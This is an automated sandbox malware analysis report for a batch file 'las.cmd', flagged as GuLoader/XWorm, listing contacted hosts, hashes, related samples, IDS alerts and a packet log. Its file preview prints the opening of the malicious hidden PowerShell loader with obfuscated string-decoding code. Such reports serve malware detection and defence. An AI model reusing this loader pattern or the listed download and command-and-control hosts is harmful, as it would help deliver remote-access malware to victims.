172.67.170.105 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446773
Start date and time: 2024-05-23 20:59:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: las.cmd
Detection: MAL
Classification: mal100.troj.evad.winCMD@13/9@6/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 36
• Number of non-executed functions: 21
Cookbook Comments:
• Found application associated with file extension: .cmd
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6100 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: las.cmd
Time | Type | Description
15:00:23 | API Interceptor | 928x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
69.31.136.17 | zap.cmd | malicious | GuLoader, XWorm
69.31.136.17 | kam.cmd | malicious | GuLoader
69.31.136.17 | upload.vbs | malicious | GuLoader, XWorm
69.31.136.17 | update.vbs | malicious | GuLoader, XWorm
69.31.136.17 | file.vbs | malicious | GuLoader
69.31.136.17 | windows.vbs | malicious | AsyncRAT, GuLoader
69.31.136.17 | windows.vbs | malicious | GuLoader, XWorm
69.31.136.17 | file.vbs | malicious | GuLoader, XWorm
69.31.136.17 | update.vbs | malicious | GuLoader
69.31.136.17 | DOCUMENTS.exe.html | malicious | Unknown
12.202.180.134 | kam.cmd | malicious | Unknown
12.202.180.134 | sample.cmd | malicious | Unknown
12.202.180.134 | zap.cmd | malicious | GuLoader, XWorm
12.202.180.134 | xff.cmd | malicious | Unknown
12.202.180.134 | xff.cmd | malicious | AsyncRAT, GuLoader
12.202.180.134 | las.cmd | malicious | GuLoader, XWorm
12.202.180.134 | las.cmd | malicious | Unknown
12.202.180.134 | las.cmd | malicious | GuLoader
12.202.180.134 | upload.vbs | malicious | GuLoader, XWorm
12.202.180.134 | update.vbs | malicious | GuLoader, XWorm
172.67.170.105 | kam.cmd | malicious | GuLoader
172.67.170.105 | xff.cmd | malicious | AsyncRAT, GuLoader
172.67.170.105 | las.cmd | malicious | GuLoader, XWorm
172.67.170.105 | windows.vbs | malicious | GuLoader, XWorm
172.67.170.105 | file.vbs | malicious | GuLoader, XWorm
172.67.170.105 | time.vbs | malicious | GuLoader
172.67.170.105 | file300un.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.sendspace.com | kam.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader | 104.21.28.80
www.sendspace.com | kam.cmd | malicious | GuLoader | 104.21.28.80
www.sendspace.com | upload.vbs | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | update.vbs | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | file.vbs | malicious | GuLoader | 104.21.28.80
www.sendspace.com | windows.vbs | malicious | AsyncRAT, GuLoader | 104.21.28.80
fs03n3.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.17
fs03n3.sendspace.com | file.vbs | malicious | GuLoader | 69.31.136.17
fs03n3.sendspace.com | file.vbs | malicious | GuLoader, XWorm | 69.31.136.17
fs03n3.sendspace.com | UHNMA702NQ.vbs | malicious | Unknown | 69.31.136.17
fs03n4.sendspace.com | kam.cmd | malicious | GuLoader | 69.31.136.17
fs03n4.sendspace.com | 1st_Payment.vbs | malicious | Revenge | 69.31.136.17
xvern429.duckdns.org | sample.cmd | malicious | Unknown | 12.202.180.134
xvern429.duckdns.org | xff.cmd | malicious | AsyncRAT, GuLoader | 12.202.180.134
xvern429.duckdns.org | file.vbs | malicious | GuLoader | 12.202.180.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | kam.cmd | malicious | GuLoader | 172.67.170.105
CLOUDFLARENETUS | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
CLOUDFLARENETUS | http://hxjmm.check-tl-ver-154-2.com | malicious | Unknown | 104.21.46.101
CLOUDFLARENETUS | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
CLOUDFLARENETUS | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
CLOUDFLARENETUS | https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recording | malicious | Unknown | 104.18.72.113
CLOUDFLARENETUS | https://t.co/PmbTTSQ6z4 | malicious | Unknown | 162.247.243.29
CLOUDFLARENETUS | Offer 15492024 15602024.docx.doc | malicious | Unknown | 172.67.171.37
CLOUDFLARENETUS | Purchase Order # PO-00159.xla.xlsx | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | LHER000698175.xls | malicious | Unknown | 188.114.96.3
GTT-BACKBONEGTTDE | kam.cmd | malicious | GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | xff.cmd | malicious | AsyncRAT, GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | las.cmd | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | las.cmd | malicious | GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | kam.cmd | malicious | GuLoader | 69.31.136.57
GTT-BACKBONEGTTDE | upload.vbs | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | update.vbs | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | file.vbs | malicious | GuLoader | 69.31.136.17
GTT-BACKBONEGTTDE | windows.vbs | malicious | AsyncRAT, GuLoader | 69.31.136.17
FISERV-INCUS | kam.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | sample.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
FISERV-INCUS | xff.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | xff.cmd | malicious | AsyncRAT, GuLoader | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | GuLoader, XWorm | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | GuLoader | 12.202.180.134
FISERV-INCUS | upload.vbs | malicious | GuLoader, XWorm | 12.202.180.134
FISERV-INCUS | update.vbs | malicious | GuLoader, XWorm | 12.202.180.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | kam.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | S28BW-420120416270,pdf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | Dextron Group PO.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | las.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | 044f.pdf.exe | malicious | AgentTesla | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 172.67.170.105, 69.31.136.17
3b5074b1b5d032e5620f69f9f700ff0e | Wgdebahewafthr.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, zgRAT | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | las.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | V_273686.Lnk.lnk | malicious | MalLnk | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | kam.cmd | malicious | GuLoader | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | Platosammine.exe | malicious | FormBook, GuLoader | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | FRA.0038222.exe | malicious | FormBook, GuLoader | 172.67.170.105, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | upload.vbs | malicious | Unknown | 172.67.170.105, 69.31.136.17
                                                                        No context
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.8908305915084105
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulnsiXz:NllUsiX
                                                                        MD5:D664BA2397F45C07CD21EF138C1A4E97
                                                                        SHA1:7D74C67DB2C0D62FF3BCAFF13D0F102E94550D30
                                                                        SHA-256:1C8181B5C6A049E968ECC6F0CDD6F0962A49AEDC6198892A09B15111900A5151
                                                                        SHA-512:5066F8E7285593B4ECBC4B0889C05B7CC71D3FFDA0C1E6CFF1548D04381AD9745034AB2CB0E16D2541EDF1030A4F838BE02C91C3CABCCB949161A4007D724ABC
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:@...e...................................3............@..........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6222
                                                                        Entropy (8bit):3.71078384633497
                                                                        Encrypted:false
                                                                        SSDEEP:96:J7W5CzoZkvhkvCCt/fwEKmPHsfwEKmCHp:J6mq/fRifRo
                                                                        MD5:17F31DB43420FEFF5A6C594FD1756E57
                                                                        SHA1:3D28FEDC689B1C2DAAEC89E9E5174A3937DA399C
                                                                        SHA-256:77C60FAC8E6FF110F3EE57B62D35C60FAA00CAAD6847ED993C95021BC7C3CCB4
                                                                        SHA-512:C4C04A7C29C2D78E9842246AC30D7A9730B9BF69347B7231EB87C86B00A2700DA7F05002EC3AE2C2AFEE3B1AB949AD55751C08A1766E40124AB9BB4987DD5DD4
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...d......+..sC...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....(..oC....d.tC.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................z...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................h.|.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6222
                                                                        Entropy (8bit):3.71078384633497
                                                                        Encrypted:false
                                                                        SSDEEP:96:J7W5CzoZkvhkvCCt/fwEKmPHsfwEKmCHp:J6mq/fRifRo
                                                                        MD5:17F31DB43420FEFF5A6C594FD1756E57
                                                                        SHA1:3D28FEDC689B1C2DAAEC89E9E5174A3937DA399C
                                                                        SHA-256:77C60FAC8E6FF110F3EE57B62D35C60FAA00CAAD6847ED993C95021BC7C3CCB4
                                                                        SHA-512:C4C04A7C29C2D78E9842246AC30D7A9730B9BF69347B7231EB87C86B00A2700DA7F05002EC3AE2C2AFEE3B1AB949AD55751C08A1766E40124AB9BB4987DD5DD4
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...d......+..sC...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....(..oC....d.tC.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................z...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................h.|.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):417828
                                                                        Entropy (8bit):5.949874981034092
                                                                        Encrypted:false
                                                                        SSDEEP:12288:flNoUxMIdKKKHzLfxap5chJ8YNGv80PVfgTFBlzq0:0UxDizLYj4lN68SeTFB5q0
                                                                        MD5:2012051E619942968DED1F085EC39637
                                                                        SHA1:F90B37DE2D7D3A42BE724EDE56FCAEBF200B18E8
                                                                        SHA-256:CB6359C5489AD4E7EABE7EE810752D2AE5D305CF060AD345950CBBC9F9460C82
                                                                        SHA-512:17F73368229C4F7DAEA3EF2D6E1D7AE75B06571AD0576A556B49E50634AA065E49DAFA95EB5DA4AF0D393619ABED8A68A92928C5797F240CE799BC93E0AEB053
                                                                        Malicious:false
                                                                        Preview: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
                                                                        File type:ASCII text, with very long lines (6553), with no line terminators
                                                                        Entropy (8bit):5.260242282962022
                                                                        TrID:
                                                                          File name:las.cmd
                                                                          File size:6'553 bytes
                                                                          MD5:1b315096e07f2cbe4bb1dae37bf115e5
                                                                          SHA1:183d4109803b7de7f8c679e5cf12d215bd6b3871
                                                                          SHA256:e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
                                                                          SHA512:b7d3fa6cbb79537c827bf80b29c0be4b11036922717d05ae79e301071651c7a1cbcf114fa1b9b0459e874c01de24bc78d67f171ecc9bba09f0ba039a7fea2683
                                                                          SSDEEP:96:k+m8Z1rXchtQtvV3c7FK+37kcu/WlJVhe9glzjAqvko644Omqnds29D6tCmXPWC7:B6hQOKM7kc3De9glzjFkFXCj9DACy
                                                                          TLSH:F9D12BF48C81601B134B32765F591A4A8AA705BE49E891E7B24307FFB50DD3871BADE8
                                                                          File Content Preview:start /min powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$
                                                                          Icon Hash:9686878b929a9886
Timestamp                 Protocol  SID      Message                                                      Source Port  Dest Port  Source IP       Dest IP
05/23/24-21:01:07.383835  TCP       2052265  ET TROJAN Observed Malicious SSL Cert (VenomRAT)             8890         62798      12.202.180.134  192.168.2.5
05/23/24-21:01:07.383835  TCP       2848152  ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)  8890         62798      12.202.180.134  192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
May 23, 2024 21:00:25.939595938 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:25.939640999 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:25.939763069 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:25.950793982 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:25.950805902 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:26.431958914 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:26.432045937 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:26.435589075 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:26.435611010 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:26.435856104 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:26.447499037 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:26.494504929 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:27.100785971 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:27.100856066 CEST  443          49704      172.67.170.105  192.168.2.5
May 23, 2024 21:00:27.100905895 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:27.135669947 CEST  49704        443        192.168.2.5     172.67.170.105
May 23, 2024 21:00:27.196193933 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.196249962 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:27.196429968 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.196775913 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.196793079 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:27.874062061 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:27.874181032 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.876507998 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.876514912 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:27.876719952 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:27.877635002 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:27.922497988 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.216512918 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.216597080 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.216641903 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.216664076 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.216679096 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.216706991 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.216773033 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.248879910 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.248929024 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.248984098 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.248990059 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.248999119 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.249032021 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.312123060 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.312170982 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.312268972 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.312289000 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.312314034 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.312329054 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.333997965 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.334042072 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.334117889 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.334122896 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.334161043 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.334184885 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.349714041 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.349756956 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.349805117 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.349809885 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.349837065 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.349848986 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.401492119 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.401567936 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.401621103 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.401632071 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.401664972 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.401683092 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.414347887 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.414403915 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.414458036 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.414463997 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.414493084 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.414515018 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.425724030 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.425769091 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.425813913 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.425820112 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.425846100 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.425863981 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.435102940 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.435142994 CEST  443          49705      69.31.136.17    192.168.2.5
